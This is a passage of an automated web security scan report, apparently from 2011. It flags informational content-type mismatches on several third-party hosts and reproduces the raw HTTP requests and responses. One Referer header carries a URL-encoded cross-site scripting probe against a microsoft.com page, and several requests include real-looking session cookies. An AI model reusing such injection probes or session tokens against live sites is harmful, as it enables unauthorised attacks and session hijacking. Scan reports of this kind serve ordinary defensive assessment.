16f60e6a6b2c1ace90fa07cc47b900c5174eceb36fd04d48af115d89be05c6c3e551e620b3a5ade8a9ad503d1f87ea9eae460023c247a3bd2c7432c3944c4d2fe440c587c86375db1c89060973f59d04e9789b6e43a04d4773063e59072ff7d9b9e033c5eb1ba6c5622ab57a7359c1c627019c9cdb4253bf4d2c877529f44ffe96a4e6079d1755855503fb07d4e2f4b2ff8b6dfd9c2bf3df203913969704acae50f9dabbce015db5f187ccaf1e838551259e3d016f9d10ca3f62e1ac73921d7d7f7668c16055fbd964d70510d824bc6a4fc13ede16c8529b3519e560528905a6c698a589515bca2c3dd41390cd58e004bfcb88af5a73e26245b6d033bd9b438c391c763b212a7a30ea79b75490603bcd1af2342fb0e53c16725ac86b99104b7858efe72acb55e7faa22a53e4b676f15b9f3c5097bfaedfeae70071cde9d9213790950c684e4e03df0e2a17e4551cfde0e5517f19b1fc0e374c6183a508779a0763e68b8d5b62c6855cd1e9ce1ab1f80919279c7f38496119233d88d1a3dbc24e85d3d838d5783d2566d68a0051f463b6f4bfdd3331d06c8b6a5d51c76f15a5d21443dbd0c6670c7bdaa3be0a104bbf57876dba9c5c928ddf236591ef12aa7c129be5265b8cd9ca3383564f530c9dc873419440ef867fa5712fc8cd9d589f6acaa54857770a79f59f4618f43dadef23cadec93964ed4b1e92d4a0d2076ce9ef36df78c97dfc78977bd6191d8ced1c3fb5760e1e47e4a45c795f13d92fda6a31a2c06cbc8a0c8e2a660ebbf5d623b135ad8ab210b8c645d4f6137873627d59f7fba294317baec039dc250131ca3fbe973a9a77984547c4816041b9c62

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html;charset=UTF-8

The response states that it contains HTML. However, it actually appears to contain CSS.

Request

GET /ots/ots/js-3.1/311121/1027ed543b58578e6e3b824071758d9bdeafd1265a7b24402f7551e927c3acb81cdbfa67bfd3446b42706edbe6b0608936758c58f0c7d1f68b5cd4c42f5e53570bdeeee23870722b7d8b04c597f794d7783788d7dcd698ad7762aafea74aa37fa510cf7fb65c91e76191dbdbfc018d381dcdbf4f180bd9e2e9dbca7cc5c43a11e023d7a7981e3897c9fb0faa723125b37b97068f26a4eab5c4c3548a0c623005a73d5504a9bf9de72f4cd03f9bbbe1e8461e15f54b45d987124df70c44f3c0e5ba4847f3eed4beed5e6ab1b12de202e38127137a41acc581ec0fecd3a959a3a538fb2f660ff25ba0654719dfbec80906eeaf8e6b329ad1c66a04d5dcf192e3cde61c254f6c88534da58802b5398ea24b9efa9ba685dfd72bea4fa8190c69ae5ede6f0721ccb34e717c6107bcfaf2cfe44f88fec42e36ffe9116f59a6f918a80dd8e17e504876f2e69c508c691b6d9281fff0acd3e99db7f9b07ac79b36cd607e06da5e9c4458d76d0eeac1f394a802d460f590fe6ea7f666d23dccd20abac2d92880ff34a405027857b7f2db653389d23a43638d06e3f765a2d8d598f1062f8fcd643983437aeac41c62611881d352de9d97c32cf54f777d612b929d8913b5bc8b0379af246e1bba7d1821ce8b1b8db8d166b7f52081b0a29d9119cb9a4f447873339c33193f96e2f108ab154593263be7f6518d1944fa3b1b1cec003d123452e5333cec0b0f3c0ae168e5d0e9db1a53bf3e808baf3f24e64c14c3f2b1e02cee7dfd5cb0cdcc45ad329b17c70e526b36a57e0b3bf603170be9a33aafff9eca4a1237a8ffe472485706d9f6c895e32c048508fbc64699631b195653c891687399cd539d3d95b6bf7900cb355e8251411b31212492b4091796c5e2d549c235a07490aa42afdae8548a987faccef67a1445162cd38c7499b47ab78ad924ef99525bd815e63ce7e885fe39ca6822ceb3602d0059b0a8f279e80766642b31203aa6d6ee97b9139867ee1aa7ba3f02f41253bf90b753118e080e6a038d7c0b2be2dc588716e7c6fc4e44d4d21802c75c1e8806abefaa114127472ef49590b2b5d5d52a87d622d582fb317c59bf26d4866e09d8a6c7a747582d807bb41131bf80bb4a8a24de4bc3ee7f8eef25e09fc0178bbc46a0a277ef134dbcf1ca97ea6ca96afc78a753694fe0857a6a3e32243f4ef6cc09f2332399d9d6b530b1b82b7bd324435314e635aa5253c38beeb1db2ad850da9fc12d1499010dbb2637e44e058368dcd0c776032f802db4acabefd54c5dee0ba16f60e6a6b2c1ace90fa07cc47b900c5174eceb36fd04d48af115d89be05c6c3e551e620b3a5ade8a9ad503d1f87ea9eae460023c247a3bd2c7432c3944c4d2fe440c587c86375db1c89060973f59d04e9789b6e43a04d4773063e59072ff7d9b9e033c5eb1ba6c5622ab57a7359c1c627019c9cdb4253bf4d2c877529f44ffe96a4e6079d1755855503fb07d4e2f4b2ff8b6dfd9c2bf3df203913969704acae50f9dabbce015db5f187ccaf1e838551259e3d016f9d10ca3f62e1ac73921d7d7f7668c16055fbd964d70510d824bc6a4fc13ede16c8529b3519e560528905a6c698a589515bca2c3dd41390cd58e004bfcb88af5a73e26245b6d033bd9b438c391c763b212a7a30ea79b75490603bcd1af2342fb0e53c16725ac86b99104b7858efe72acb55e7faa22a53e4b676f15b9f3c5097bfaedfeae70071cde9d9213790950c684e4e03df0e2a17e4551cfde0e5517f19b1fc0e374c6183a508779a0763e68b8d5b62c6855cd1e9ce1ab1f80919279c7f38496119233d88d1a3dbc24e85d3d838d5783d2566d68a0051f463b6f4bfdd3331d06c8b6a5d51c76f15a5d21443dbd0c6670c7bdaa3be0a104bbf57876dba9c5c928ddf236591ef12aa7c129be5265b8cd9ca3383564f530c9dc873419440ef867fa5712fc8cd9d589f6acaa54857770a79f59f4618f43dadef23cadec93964ed4b1e92d4a0d2076ce9ef36df78c97dfc78977bd6191d8ced1c3fb5760e1e47e4a45c795f13d92fda6a31a2c06cbc8a0c8e2a660ebbf5d623b135ad8ab210b8c645d4f6137873627d59f7fba294317baec039dc250131ca3fbe973a9a77984547c4816041b9c62 HTTP/1.1
Host: ots.optimize.webtrends.com
Proxy-Connection: keep-alive
Referer: http://www.microsoft.com/en-au/netsolutionswa/casestudies.aspx?bladeFlyout=LocalePicker&SearchType=0&navIndex=2&hdrFo=mthdr02
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=367B4F903A397F6235C1F2804D37ACB4

Response

Summary

Severity:	Information
Confidence:	Firm
Host:	http://ots.optimize.webtrends.com
Path:	/ots/ots/js-3.1/311121/1027ed543b58578e6e3b824071758d9bdeafd1265a7b24402f7551e927c3acb81cdbfa67bfd3446b42706edbe6b0608936758c58f0c7d1f68b5cd4c42f5e53570bdeeee23870722b7d8b04c597f794d7783788d7dcd698ad7762aafea74aa37fa510cf7fb65c91e76191dbdbfc018d381dcdbf4f180bd9e2e9dbca7cc5c43a11e023d7a7981e3897c9fb0faa723125b37b97068f26a4eab5c4c3548a0c623005a73d5504a9bf9de72f4cd03f9bbbe1e8461e15f54b45d987124df70c44f3c0e5ba4847f3eed4beed5e6ab1b12de202e38127137a41acc581ec0fecd3a959a3a538fb2f660ff25ba0654719dfbec80906eeaf8e6b329ad1c66a04d5dcf192e3cde61c254f6c88534da58802b5398ea24b9efa9ba685dfd72bea4fa8190c69ae5ede6f0721ccb34e717c6107bcfaf2cfe44f88fec42e36ffe9116f59a6f918a80dd8e17e504876f2e69c508c691b6d9281fff0acd3e99db7f9b07ac79b36cd607e06da5e9c4458d76d0eeac1f394a802d460f590fe6ea7f666d23dccd20abac2d92880ff34a405027857b7f2db653389d23a43638d06e3f765a2d8d598f1062f8fcd643983437aeac41c62611881d352de9d97c32cf54f777d612b929d8913b5bc8b0379af246e1bba7d1821ce8b1b8db8d166b7f52081b0a29d9119cb9a4f447873339c33193f96e2f108ab154593263be7f6518d1944fa3b1b1cec003d123452e5333cec0b0f3c0ae168e5d0e9db1a53bf3e808baf3f24e64c14c3f2b1e02cee7dfd5cb0cdcc45ad329b17c70e526b36a57e0b3bf603170be9a33aafff9eca4a1237a8ffe472485706d9f6c895e32c048508fbc64699631b195653c891687399cd539d3d95b6bf7900cb355e8251411b31212492b4091796c5e2d549c235a07490aa42afdae8548a987faccef67a1445162cd38c7499b47ab78ad924ef99525bd815e63ce7e885fe39ca6822ceb3602d0059b0a8f279e80766642b31203aa6d6ee97b9139867ee1aa7ba3f02f41253bf90b753118e080e6a038d7c0b2be2dc588716e7c6fc4e44d4d21802c75c1e8806abefaa114127472ef49590b2b5d5d52a87d622d582fb317c59bf26d4866e09d8a6c7a747582d807bb41131bf80bb4a8a24de4bc3ee7f8eef25e09fc0178bbc46a0a277ef134dbcf1ca97ea6ca96afc78a753694fe0857a6a3e32243f4ef6cc09f2332399d9d6b530b1b82b7bd324435314e635aa5253c38beeb1db2ad850da9fc12d1499010dbb2637e44e058368dcd0c776032f802db4acabefd54c5dee0ba16f60e6a6b2c1ace90fa07cc47b900c5174eceb36fd04d48af115d89be05c6c3e551e620b3a5ade8a9ad503d1f87ea9eae460023c247a3bd2c7432c3944c4d2fe440c587c86375db1c89060973f59d04e9789b6e43a04d4773063e59072ff7d9b9e033c5eb1ba6c5622ab57a7359c1c627019c9cdb4253bf4d2c877529f44ffe96a4e6079d1755855503fb07d4e2f4b2ff8b6dfd9c2bf3df203913969704acae50f9dabbce015db5f187ccaf1e838551259e3d016f9d10ca3f62e1ac73921d7d7f7668c16055fbd964d70510d824bc6a4fc13ede16c8529b3519e560528905a6c698a589515bca2c3dd41390cd58e004bfcb88af5a73e26245b6d033bd9b438c391c763b212a7a30ea79b75490603bcd1af2342fb0e53c16725ac86b99104b7858efe72acb55e7faa22a53e4b676f15b9f3c5097bfaedfeae70071cde9d9213790950c684e4e03df0e2a17e4551cfde0e5517f19b1fc0e374c6183a508779a0763e68b8d5b62c6855cd1e9ce1ab1f80919279c7f38496119233d88d1a3dbc24e85d3d838d5783d2566d68a0051f463b6f4bfdd3331d06c8b6a5d51c76f15a5d21443dbd0c6670c7bdaa3be0a104bbf57876dba9c5c928ddf236591ef12aa7c129be5265b8cd9ca3383564f530c9dc8734195e13e473e5477f80fae3f4f889c7a853856a70bf995a8208e85de0f4cf1d9dccbaa929d2fcbc646e010a6083c1be46d0eb909292c053b14b8795919ce8dc3067b1bb3d7345cb89da2f89fef0a17b13309a9ef385b98035afeb4a79786d398dba2f4f8e65081d313780362dd1cd7eef7b4646eaea4084d0667e77d299cb65a1b72184547c481603bc57d1

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html;charset=UTF-8

The response states that it contains HTML. However, it actually appears to contain CSS.

Request

GET /ots/ots/js-3.1/311121/1027ed543b58578e6e3b824071758d9bdeafd1265a7b24402f7551e927c3acb81cdbfa67bfd3446b42706edbe6b0608936758c58f0c7d1f68b5cd4c42f5e53570bdeeee23870722b7d8b04c597f794d7783788d7dcd698ad7762aafea74aa37fa510cf7fb65c91e76191dbdbfc018d381dcdbf4f180bd9e2e9dbca7cc5c43a11e023d7a7981e3897c9fb0faa723125b37b97068f26a4eab5c4c3548a0c623005a73d5504a9bf9de72f4cd03f9bbbe1e8461e15f54b45d987124df70c44f3c0e5ba4847f3eed4beed5e6ab1b12de202e38127137a41acc581ec0fecd3a959a3a538fb2f660ff25ba0654719dfbec80906eeaf8e6b329ad1c66a04d5dcf192e3cde61c254f6c88534da58802b5398ea24b9efa9ba685dfd72bea4fa8190c69ae5ede6f0721ccb34e717c6107bcfaf2cfe44f88fec42e36ffe9116f59a6f918a80dd8e17e504876f2e69c508c691b6d9281fff0acd3e99db7f9b07ac79b36cd607e06da5e9c4458d76d0eeac1f394a802d460f590fe6ea7f666d23dccd20abac2d92880ff34a405027857b7f2db653389d23a43638d06e3f765a2d8d598f1062f8fcd643983437aeac41c62611881d352de9d97c32cf54f777d612b929d8913b5bc8b0379af246e1bba7d1821ce8b1b8db8d166b7f52081b0a29d9119cb9a4f447873339c33193f96e2f108ab154593263be7f6518d1944fa3b1b1cec003d123452e5333cec0b0f3c0ae168e5d0e9db1a53bf3e808baf3f24e64c14c3f2b1e02cee7dfd5cb0cdcc45ad329b17c70e526b36a57e0b3bf603170be9a33aafff9eca4a1237a8ffe472485706d9f6c895e32c048508fbc64699631b195653c891687399cd539d3d95b6bf7900cb355e8251411b31212492b4091796c5e2d549c235a07490aa42afdae8548a987faccef67a1445162cd38c7499b47ab78ad924ef99525bd815e63ce7e885fe39ca6822ceb3602d0059b0a8f279e80766642b31203aa6d6ee97b9139867ee1aa7ba3f02f41253bf90b753118e080e6a038d7c0b2be2dc588716e7c6fc4e44d4d21802c75c1e8806abefaa114127472ef49590b2b5d5d52a87d622d582fb317c59bf26d4866e09d8a6c7a747582d807bb41131bf80bb4a8a24de4bc3ee7f8eef25e09fc0178bbc46a0a277ef134dbcf1ca97ea6ca96afc78a753694fe0857a6a3e32243f4ef6cc09f2332399d9d6b530b1b82b7bd324435314e635aa5253c38beeb1db2ad850da9fc12d1499010dbb2637e44e058368dcd0c776032f802db4acabefd54c5dee0ba16f60e6a6b2c1ace90fa07cc47b900c5174eceb36fd04d48af115d89be05c6c3e551e620b3a5ade8a9ad503d1f87ea9eae460023c247a3bd2c7432c3944c4d2fe440c587c86375db1c89060973f59d04e9789b6e43a04d4773063e59072ff7d9b9e033c5eb1ba6c5622ab57a7359c1c627019c9cdb4253bf4d2c877529f44ffe96a4e6079d1755855503fb07d4e2f4b2ff8b6dfd9c2bf3df203913969704acae50f9dabbce015db5f187ccaf1e838551259e3d016f9d10ca3f62e1ac73921d7d7f7668c16055fbd964d70510d824bc6a4fc13ede16c8529b3519e560528905a6c698a589515bca2c3dd41390cd58e004bfcb88af5a73e26245b6d033bd9b438c391c763b212a7a30ea79b75490603bcd1af2342fb0e53c16725ac86b99104b7858efe72acb55e7faa22a53e4b676f15b9f3c5097bfaedfeae70071cde9d9213790950c684e4e03df0e2a17e4551cfde0e5517f19b1fc0e374c6183a508779a0763e68b8d5b62c6855cd1e9ce1ab1f80919279c7f38496119233d88d1a3dbc24e85d3d838d5783d2566d68a0051f463b6f4bfdd3331d06c8b6a5d51c76f15a5d21443dbd0c6670c7bdaa3be0a104bbf57876dba9c5c928ddf236591ef12aa7c129be5265b8cd9ca3383564f530c9dc8734195e13e473e5477f80fae3f4f889c7a853856a70bf995a8208e85de0f4cf1d9dccbaa929d2fcbc646e010a6083c1be46d0eb909292c053b14b8795919ce8dc3067b1bb3d7345cb89da2f89fef0a17b13309a9ef385b98035afeb4a79786d398dba2f4f8e65081d313780362dd1cd7eef7b4646eaea4084d0667e77d299cb65a1b72184547c481603bc57d1 HTTP/1.1
Host: ots.optimize.webtrends.com
Proxy-Connection: keep-alive
Referer: http://www.microsoft.com/en-au/netsolutionswa/casestudies.aspx?bladeFlyout=LocalePicker&SearchType=0&navIndex=2&hdrFo=mthdr02
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=10D213871EB701B33BE9A6992DF90D28

Response

Summary

Severity:	Information
Confidence:	Firm
Host:	http://ots.optimize.webtrends.com
Path:	/ots/ots/js-3.1/311121/1027ed543b58578e6e3b824071758d9bdeafd1265a7b24402f7551e927c3acb81cdbfa67bfd3446b42706edbe6b0608936758c58f0c7d1f68b5cd4c42f5e53570bdeeee23870722b7d8b04c597f794d7783788d7dcd698ad7762aafea74aa37fa510cf7fb65c91e76191dbdbfc018d381dcdbf4f180bd9e2e9dbca7cc5c43a11e023d7a7981e3897c9fb0faa723125b37b97068f26a4eab5c4c3548a0c623005a73d5504a9bf9de72f4cd03f9bbbe1e8461e15f54b45d987124df70c44f3c0e5ba4847f3eed4beed5e6ab1b12de202e38127137a41ace38de70fd1d0bd08fcf372b5762404eb44e72200079ef5c91708f9a5ae736596cbdf675b99a2f886bec6a144744639c5121396c44ffe2bc2b3439debd6b39cdecc3ab105a609097cf452c6200f2be9be4377667b13ccbae2cdfa43a8e3997766bbae273b5ab1ff469a5692a672421334b1f3ba5183650623829decb693d6b682e0afe92d849a36d77c696f9b02f52213c7753c022c538b

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html;charset=UTF-8

The response states that it contains HTML. However, it actually appears to contain CSS.

Request

Response

Summary

Severity:	Information
Confidence:	Firm
Host:	http://ots.optimize.webtrends.com
Path:	/ots/ots/js-3.1/311121/1027ed543b58578e6e3b824071758d9bdeafd1265a7b24402f7551e927c3acb81cdbfa67bfd3446b42706edbe6b0608936758c58f0c7d1f68b5cd4c42f5e53570bdeeee23870722b7d8b04c597f794d7783788d7dcd698ad7762aafea74aa37fa510cf7fb65c91e76191dbdbfc018d381dcdbf4f180bd9e2e9dbca7cc5c43a11e023d7a7981e3897c9fb0faa723125b37b97068f26a4eab5c4c3548a0c623005a73d5504a9bf9de72f4cd03f9bbbe1e8461e15f54b45d987124df70c44f3c0e5ba4847f3eed4beed5e6ab1b12de202e38127137a41ace38de70fd1d0bd08fcf372b5762404eb44e72200079ef5c91708f9a5ae736596cbdf675b99a2f886bec6a144744639c5121396c44ffe2bc2b3439debd6b39cdecc3ab105a609097cf452c6200f2be9be4377667b13ccbae2cdfa43a8e3997766bbae273b5ab1ff469a5692a672421334b1f3ba5183650623829decb693d6b782e0af9f4bfcef26c36e0336dd479c6658e55070b5e4b7bde575cc77e590f867a08763d726c3f654ef95915adab36bfc3316044cd6a98a351cdbc765154dd94cf8f96bd3f0e1a3d64c41d4f8322d882278fbdb09384558fc8f7582dc8dbd36862f1a683879d69ad104caddc45b33a22e2e65f1675c77ef961b91a2d167b7f57993dfcd8fec5580d8231a393458d620142e94f6f269a51b2aa34877aff62cfa6133e8200a75b3497c79770b83465fb0385d11479666fda58cb46d32ac54e7e9a04334e25d15d5a9f7a264df2eda17fe91dc4ecc20e963d77951256af5214019cd6f611bf6b23eb9fb9dbd561721adf984763f4077d2bc84b0af0863f60defc331fd636c7927438ad26c6eccb308df66a0d1ff243efc1c698559510e214e23fff01516a58fa093338256ef38c5ea138596a112dcf552fbdefe2c4c1b436894db29d0a47cb09fd3488ccf12068f54fd24f588e29247b90d39b9d40132105bfee5a360f21b757e3a35367cfcc6f186dd15e972e41ee4e67941aa4e0eaa87b73507fd1f492b52d1234a3ce2cb4ff772f0c6bd0b16908f0b05cc4d1dfe10af9dba1043711677a48995b7a7d4a23a82dd4ea3fc9b260d4ea826e1c6325fc2a6c2e650583a9609804e70e8a5f716dd338e0bf6ae34cfbe7ebfdf8022cfe474f0fe21af4665e3a79e8ae91db569886db8420c19b2b30c2c1c63732f18b5ed18ef28279ec4ddb637afa8431bc274021742b572a14459d6f4b2e6ab6bfe07ca81960925b4263fcc363fe34c668a7883928025527d972ea2aea9ee854450bf5dbb737684cdd0bfdff903b77bdf72807f567c8d872286509dc6c75890d0b6496e3c401d1b0c2d45ab809ad65f96ba39fdb3a07f033a3b7a4a8bc0316967129582a418440a76875c4ab6bd836c845d108009fecceeb27304b13a1272ce9369ce22c1ae722745a9ae1e0d72ed09f77e9d7b1d1778919ed76173b2b2d76d12d473afb223296c6aa0782f732a41e55e5f21455ac780dfbfdaa74baa54913b096350a2a2538da9bce11ccd5c0770d0f1e32750022f9fa403efc055eaa17044cf2b5dc5c9e13fd24a4120d6805860500f835dc7a2f217ebee6d8f3fc044f00e1603fa4f3555e30ff220bbc4a3ac566017df870717fbc4f692a62b5f5b2f12782aa5ca41a897a702d618dfd102d095794e620edbafe46c12f90e58c93131cda5f4d64fbda184b517cada3714df33af2a363f3856e5b59a5c3b8b99bdfc722c40d2c3b52d6e5c14daf9868257d58bda654d169283155b199ebb7094b7239f0f6613d37ba427343eb1d3b62c6f04c10e99b3e8129391e77c83be93f727fa5ff3a245056473e3

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html;charset=UTF-8

The response states that it contains HTML. However, it actually appears to contain CSS.

Request

GET /ots/ots/js-3.1/311121/1027ed543b58578e6e3b824071758d9bdeafd1265a7b24402f7551e927c3acb81cdbfa67bfd3446b42706edbe6b0608936758c58f0c7d1f68b5cd4c42f5e53570bdeeee23870722b7d8b04c597f794d7783788d7dcd698ad7762aafea74aa37fa510cf7fb65c91e76191dbdbfc018d381dcdbf4f180bd9e2e9dbca7cc5c43a11e023d7a7981e3897c9fb0faa723125b37b97068f26a4eab5c4c3548a0c623005a73d5504a9bf9de72f4cd03f9bbbe1e8461e15f54b45d987124df70c44f3c0e5ba4847f3eed4beed5e6ab1b12de202e38127137a41ace38de70fd1d0bd08fcf372b5762404eb44e72200079ef5c91708f9a5ae736596cbdf675b99a2f886bec6a144744639c5121396c44ffe2bc2b3439debd6b39cdecc3ab105a609097cf452c6200f2be9be4377667b13ccbae2cdfa43a8e3997766bbae273b5ab1ff469a5692a672421334b1f3ba5183650623829decb693d6b782e0af9f4bfcef26c36e0336dd479c6658e55070b5e4b7bde575cc77e590f867a08763d726c3f654ef95915adab36bfc3316044cd6a98a351cdbc765154dd94cf8f96bd3f0e1a3d64c41d4f8322d882278fbdb09384558fc8f7582dc8dbd36862f1a683879d69ad104caddc45b33a22e2e65f1675c77ef961b91a2d167b7f57993dfcd8fec5580d8231a393458d620142e94f6f269a51b2aa34877aff62cfa6133e8200a75b3497c79770b83465fb0385d11479666fda58cb46d32ac54e7e9a04334e25d15d5a9f7a264df2eda17fe91dc4ecc20e963d77951256af5214019cd6f611bf6b23eb9fb9dbd561721adf984763f4077d2bc84b0af0863f60defc331fd636c7927438ad26c6eccb308df66a0d1ff243efc1c698559510e214e23fff01516a58fa093338256ef38c5ea138596a112dcf552fbdefe2c4c1b436894db29d0a47cb09fd3488ccf12068f54fd24f588e29247b90d39b9d40132105bfee5a360f21b757e3a35367cfcc6f186dd15e972e41ee4e67941aa4e0eaa87b73507fd1f492b52d1234a3ce2cb4ff772f0c6bd0b16908f0b05cc4d1dfe10af9dba1043711677a48995b7a7d4a23a82dd4ea3fc9b260d4ea826e1c6325fc2a6c2e650583a9609804e70e8a5f716dd338e0bf6ae34cfbe7ebfdf8022cfe474f0fe21af4665e3a79e8ae91db569886db8420c19b2b30c2c1c63732f18b5ed18ef28279ec4ddb637afa8431bc274021742b572a14459d6f4b2e6ab6bfe07ca81960925b4263fcc363fe34c668a7883928025527d972ea2aea9ee854450bf5dbb737684cdd0bfdff903b77bdf72807f567c8d872286509dc6c75890d0b6496e3c401d1b0c2d45ab809ad65f96ba39fdb3a07f033a3b7a4a8bc0316967129582a418440a76875c4ab6bd836c845d108009fecceeb27304b13a1272ce9369ce22c1ae722745a9ae1e0d72ed09f77e9d7b1d1778919ed76173b2b2d76d12d473afb223296c6aa0782f732a41e55e5f21455ac780dfbfdaa74baa54913b096350a2a2538da9bce11ccd5c0770d0f1e32750022f9fa403efc055eaa17044cf2b5dc5c9e13fd24a4120d6805860500f835dc7a2f217ebee6d8f3fc044f00e1603fa4f3555e30ff220bbc4a3ac566017df870717fbc4f692a62b5f5b2f12782aa5ca41a897a702d618dfd102d095794e620edbafe46c12f90e58c93131cda5f4d64fbda184b517cada3714df33af2a363f3856e5b59a5c3b8b99bdfc722c40d2c3b52d6e5c14daf9868257d58bda654d169283155b199ebb7094b7239f0f6613d37ba427343eb1d3b62c6f04c10e99b3e8129391e77c83be93f727fa5ff3a245056473e3 HTTP/1.1
Host: ots.optimize.webtrends.com
Proxy-Connection: keep-alive
Referer: http://www.microsoft.com/en-us/security_essentials/default.aspx?bladeFlyout=Share&f9857%22%3E%3Cscript%3Ealert%28document.location%29%3C/script%3E256ae1bee6f=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

29.75. http://rad.msn.com/ADSAdClient31.dll previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://rad.msn.com
Path:	/ADSAdClient31.dll

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; Charset=utf-8

The response states that it contains HTML. However, it actually appears to contain script.

Request

Response

29.76. http://rt.disqus.com/forums/realtime-cached.js previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://rt.disqus.com
Path:	/forums/realtime-cached.js

Issue detail

The response contains the following Content-type statement:

Content-Type: application/x-javascript

The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /forums/realtime-cached.js?timestamp=2011-07-21_15:22:23&thread_id=254804725&f=lifescript&1311276302179 HTTP/1.1
Host: rt.disqus.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.lifescript.com/Health/Conditions/ADD/How_to_Quiet_the_Symptoms_of_Adult_ADHD.aspx?utm_source=outbrain&utm_medium=cpc&utm_campaign=ADHD_Adult
Cookie: __qca=P0-1994503427-1305051999515

Response

HTTP/1.1 200 OK
Server: nginx
Date: Thu, 21 Jul 2011 19:29:50 GMT
Content-Type: application/x-javascript
Content-Length: 67
Last-Modified: Mon, 17 Jan 2011 19:57:15 GMT
Connection: close
Accept-Ranges: bytes

DISQUS.dtpl.actions.fire("realtime.update", "2010-12-08_19:48:43")

29.77. http://scripts.chitika.net/static/hq/lifescript.js previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://scripts.chitika.net
Path:	/static/hq/lifescript.js

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain script.

Request

Response

29.78. https://servicing.capitalone.com/C1/Themes/TopTabMenu/Images/Marketing/Ban_IPOS.gif previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	https://servicing.capitalone.com
Path:	/C1/Themes/TopTabMenu/Images/Marketing/Ban_IPOS.gif

Issue detail

The response contains the following Content-type statement:

Content-Type: image/gif

The response states that it contains a GIF image. However, it actually appears to contain a BMP image.

Request

GET /C1/Themes/TopTabMenu/Images/Marketing/Ban_IPOS.gif HTTP/1.1
Host: servicing.capitalone.com
Connection: keep-alive
Referer: https://servicing.capitalone.com/c1/login.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=FB8DCF93533EFDA4; caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0400; caponeaf_split=exp1%3DA_exp2%3DA_exp3%3DA_exp4%3DA_exp5%3DA_exp6%3DA_exp7%3DA; __utma=106121180.767001896.1311366537.1311366537.1311366537.1; __utmb=106121180.1.10.1311366537; __utmc=106121180; __utmz=106121180.1311366537.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); LP_GROUP=49; caponesn=af558df5VY%2FBjsIwDET%2FJXckO1C2dU9oJY574ANauWlEi0pSJbkA5d%2FXLblw8pNnPBpf7HX0rolUkvrjJMyTqhvnnV0MzzKMEVUfSZ3OZ9IAJRxA79IVcKcBEY5QyQEWBVRL2NJ4eo6z8b2Vw4IUAiBsln1RLu3sQ%2BKp%2FVjbp%2FllM9iGCekVCQ%2FZv2YDVKhVzRLy2pK6foxJ1ZH2pKRIpsl3K4keOmf6zDFxsitrUu6Rl3e%2B%2BZDZSY9hZXmtC%2BzM8C2839IYf6p%2F; lpVsGroupTracker=ndb; itc=CAPITALONE11NZZZDN1QSWZD4; mbox=check#true#1311366883|session#1311366822807-148063#1311368683|disable#browser%20timeout#1311370442; ASP.NET_SessionId=t40lmqeexjtjkkvhq4caiv55; COUNTRYCODE=USA; TestCookie=OK; ssotgt=f2eos; C1_REDIRECT=; SSP_Params=; VS_COOKIE=Login

Response

HTTP/1.1 200 OK
Cache-Control: max-age=28800
Content-Length: 58054
Content-Type: image/gif
Last-Modified: Thu, 29 Oct 2009 18:10:44 GMT
Accept-Ranges: bytes
ETag: "0eaa721c358ca1:996e"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Fri, 22 Jul 2011 20:36:18 GMT

BM........6...(.......d.................................................................................................................................................................................
...[SNIP]...

29.79. https://servicing.capitalone.com/C1/Themes/TopTabMenu/images/header_bg.gif previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	https://servicing.capitalone.com
Path:	/C1/Themes/TopTabMenu/images/header_bg.gif

Issue detail

The response contains the following Content-type statement:

Content-Type: image/gif

The response states that it contains a GIF image. However, it actually appears to contain a PNG image.

Request

GET /C1/Themes/TopTabMenu/images/header_bg.gif HTTP/1.1
Host: servicing.capitalone.com
Connection: keep-alive
Referer: https://servicing.capitalone.com/c1/login.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
